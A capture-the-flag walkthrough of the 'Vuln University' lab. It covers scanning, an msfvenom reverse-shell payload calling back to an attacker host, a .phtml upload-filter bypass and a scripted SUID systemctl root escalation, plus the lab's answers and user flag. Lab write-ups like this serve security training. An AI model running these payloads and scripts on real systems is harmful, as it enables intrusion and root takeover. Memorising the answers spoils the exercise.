sudo nmap -sS -A -T4 10.10.129.126 -oN initial.nmap
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 08:10 EDT
Nmap scan report for 10.10.129.126
Host is up (0.16s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a4ffcb8c8761cb5851cacb286411c5a (RSA)
| 256 ac9dec44610c28850088e968e9d0cb3d (ECDSA)
|_ 256 3050cb705a865722cb52d93634dca558 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Vuln University
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=3/23%OT=21%CT=1%CU=30210%PV=Y%DS=2%DC=T%G=Y%TM=641C41F
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST1
OS:1NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: vulnuniversity
| NetBIOS computer name: VULNUNIVERSITY\x00
| Domain name: \x00
| FQDN: vulnuniversity
|_ System time: 2023-03-23T08:11:29-04:00
|_clock-skew: mean: 1h20m01s, deviation: 2h18m34s, median: 1s
| smb2-time:
| date: 2023-03-23T12:11:30
|_ start_date: N/A
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 169.87 ms 10.8.0.1
2 170.48 ms 10.10.129.126
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.42 seconds
Full port scan (all 65,535 TCP ports) to catch anything outside the default top 1000
sudo nmap -sS -p- -T4 10.10.129.126 -oN full.nmap
Nmap scan report for 10.10.129.126
Host is up (0.17s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3128/tcp open squid-http
3333/tcp open dec-notes
Nmap done: 1 IP address (1 host up) scanned in 907.61 seconds
How many ports are open?
6 (the -p- sweep found nothing beyond the six ports from the initial scan)
What version of the squid proxy is running on the machine?
3.5.12
OS Version
Ubuntu
What port is the web server running on?
3333
Directory Busting
gobuster dir -u http://10.10.129.126:3333/ -w /usr/share/wordlists/dirb/big.txt
What is the directory that has an upload form page?
/internal/
Compromise the webserver
Make a php msfvenom payload and try to upload it.
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.8.64.134 LPORT=4444 -f raw > shell.php
What common file type, which you'd want to upload to exploit the server, is blocked? Try a couple to find out.
php
Fuzz allowed extensions with Burp
Intercept the file upload request in Burp and send it to Intruder. Mark the file extension in the filename as the payload position (select only the part after the full stop), load a list of PHP extensions (php3, php4, php5, phtml, phar, ...) as the payload set and run the attack. The response that differs from the rest shows which extension gets past the filter.
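The same extension check done from the command line with curl instead of Burp Intruder, as an added example (not part of the original writeup). It assumes the upload form at /internal/ posts a multipart field named "file" and that a rejected upload comes back with a body containing "Extension not allowed"; both are assumptions to adjust to the real form.

```shell
#!/bin/sh
# Added example, not from the original writeup: fuzz upload extensions with
# curl rather than Burp Intruder.
# Assumptions (adjust for the real form):
#   - the upload form posts a multipart field named "file"
#   - a rejected upload returns a body containing "Extension not allowed"
TARGET="${TARGET:-http://10.10.129.126:3333/internal/index.php}"
FIELD="${FIELD:-file}"
REJECT_MARKER="${REJECT_MARKER:-Extension not allowed}"

# Alternative PHP extensions worth trying when plain .php is filtered.
candidate_extensions() {
    printf '%s\n' php php3 php4 php5 php7 phtml phar phps pht
}

# classify_response BODY: print "blocked" if the body carries the rejection
# marker, otherwise "allowed" (so any unexpected reply is surfaced for review).
classify_response() {
    case "$1" in
        *"$REJECT_MARKER"*) echo blocked ;;
        *) echo allowed ;;
    esac
}

# try_extension EXT: upload a harmless probe named probe.EXT and print the verdict.
try_extension() {
    ext="$1"
    tmp=$(mktemp)
    printf '<?php echo "probe"; ?>' > "$tmp"
    body=$(curl -s -F "$FIELD=@$tmp;filename=probe.$ext" "$TARGET")
    rm -f "$tmp"
    printf '%-6s %s\n' "$ext" "$(classify_response "$body")"
}

# Only talk to the target when explicitly asked: RUN=1 sh fuzz_ext.sh
if [ "${RUN:-0}" = 1 ]; then
    for ext in $(candidate_extensions); do
        try_extension "$ext"
    done
fi
```

Run it with `RUN=1 sh fuzz_ext.sh` against the box. An "allowed" verdict only means the filter let the name through; whether the file then executes as PHP depends on the Apache handler mapping. On Ubuntu the stock PHP module config maps .php, .phar and .phtml to the PHP handler, which is why .phtml is the useful one here.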
cp shell.php shell.phtml
Upload it now and it is accepted, but the msfvenom meterpreter shell kept dying.
So I generated a PHP reverse shell from pentestmonkey via revshells instead, which worked.
What extension is allowed?
.phtml
What is the name of the user who manages the webserver?
bill
What is the user flag?
8bd7992fbe8a6ad22a63361004cfcedb
Privilege Escalation
search for SUID files
find / -perm -u=s -type f 2>/dev/null
On the system, search for all SUID files. What file stands out?
/bin/systemctl
Check GTFOBins for systemctl: it lists a working SUID method (link and start a unit file whose ExecStart command then runs as root).
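The GTFOBins SUID technique for systemctl written out as a script, as an added example (not from the original writeup). It assumes the SUID binary is the /bin/systemctl found by the find command above; the command run as root and its output path are placeholders to adapt.

```shell
#!/bin/sh
# Added example, not from the original writeup: the GTFOBins SUID method for
# systemctl. Because /bin/systemctl is SUID root, an unprivileged user can link
# an arbitrary unit file and start it; systemd (PID 1, root) then runs the
# ExecStart command. Assumptions: SYSTEMCTL is the SUID binary found above;
# CMD and its output path are placeholders. Keep CMD free of double quotes.
SYSTEMCTL="${SYSTEMCTL:-/bin/systemctl}"
CMD="${CMD:-id > /tmp/suid_systemctl.out}"

# is_suid PATH: true when the file exists and has the set-user-ID bit
is_suid() {
    [ -u "$1" ]
}

# write_unit PATH CMD: write a oneshot service whose ExecStart runs CMD.
# [Install]/WantedBy lets "enable" install it; Type=oneshot makes "start"
# wait for CMD to finish.
write_unit() {
    cat > "$1" <<EOF
[Service]
Type=oneshot
ExecStart=/bin/sh -c "$2"
[Install]
WantedBy=multi-user.target
EOF
}

# unit_execstart PATH: print the ExecStart line, to eyeball before linking
unit_execstart() {
    grep '^ExecStart=' "$1"
}

# exploit: check the SUID bit, write the unit, link it and start it as root
exploit() {
    if ! is_suid "$SYSTEMCTL"; then
        echo "$SYSTEMCTL is not SUID; this method will not work" >&2
        return 1
    fi
    unit="$(mktemp).service"        # systemctl insists on the .service suffix
    write_unit "$unit" "$CMD"
    unit_execstart "$unit"
    "$SYSTEMCTL" link "$unit"
    "$SYSTEMCTL" enable --now "$unit"
}

# Only run on a live target when explicitly asked: RUN=1 sh suid_systemctl.sh
if [ "${RUN:-0}" = 1 ]; then
    exploit && cat /tmp/suid_systemctl.out
fi
```

Run with `RUN=1 sh suid_systemctl.sh` on the box; the output file should show uid=0. CMD can be anything, for instance copying a root-only file out to /tmp, or `chmod +s /bin/bash` for a persistent root shell via `bash -p`. The `link` step is needed because the unit lives outside the normal unit directories, and the is_suid check matters because the same script does nothing useful on a host where systemctl is not SUID.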